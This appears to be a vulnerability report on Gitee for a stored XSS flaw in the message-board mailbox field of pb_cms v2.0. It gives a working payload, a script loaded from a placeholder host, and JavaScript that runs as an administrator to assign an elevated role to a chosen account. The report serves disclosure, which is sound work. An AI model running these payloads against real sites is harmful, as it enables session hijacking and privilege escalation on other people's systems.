A stored XSS vulnerability in pb_cms v2.0 message board

The message board function in pb_cms v2.0 allows attackers to insert malicious XSS code into the mailbox information in the message board and trigger it in the background of the administrator.

Account is not required.

Enter the message board page, insert the malicious XSS code into the mailbox input box, complete other information, and then submit.

payload: `<script>alert(document.cookie)</script>`

![输入图片说明](https://images.gitee.com/uploads/images/2022/0315/165330_04c2a140_4836459.png "email_save_2.png")

When an administrator or other role with permission to manage the comment management page enters the comment management page, the malicious XSS code is successfully triggered:

![输入图片说明](https://images.gitee.com/uploads/images/2022/0315/165348_a375b631_4836459.png "email_show_2.png")
![输入图片说明](https://images.gitee.com/uploads/images/2022/0315/165454_4155dc4d_4836459.png "email_code_2.png")

### Escalation of Privileges
At the same time, this vulnerability can be used to escalate any account privileges to any role.
Enter the message board page, insert the malicious XSS code into the mailbox input box, complete other information, and then submit.
payload:`<script src="http://xxxxx/x.js"></script>`
x.js:
```javascript
$.post(
    "user/list", {
        pageNumber: 1,
        pageSize: 9999
    },
    function(data) {
        console.log(data);
        for (const index in data.rows) {
            console.log(data.rows[index]);
            console.log(data.rows[index].userId);
            console.log(data.rows[index].username);
            if (data.rows[index].username === 'test') {
                $.post(
                    "user/assign/role", {
                        roleIdStr: 1,
                        userId: data.rows[index].userId
                    });
            }
        }
    }
);
```

The role of the test account used for testing prior to visiting the **Comment Management** page：

![输入图片说明](https://images.gitee.com/uploads/images/2022/0315/195726_52e93bb5_4836459.png "tq.png")

When an administrator or other role with permission to manage the comment management page enters the comment management page, the malicious XSS code is successfully triggered:

![输入图片说明](https://images.gitee.com/uploads/images/2022/0315/200048_8830c902_4836459.png "tq_2.png")
![输入图片说明](https://images.gitee.com/uploads/images/2022/0315/200056_f981bb51_4836459.png "tq_3.png")
Safety advice:

- Strictly filter the user's input
- Strict control of page rendering content

LinZhaoguan/pb-cms

内容风险标识

评论 (0)

LinZhaoguan/pb-cms .gitee-modal { width: 500px !important; }

内容风险标识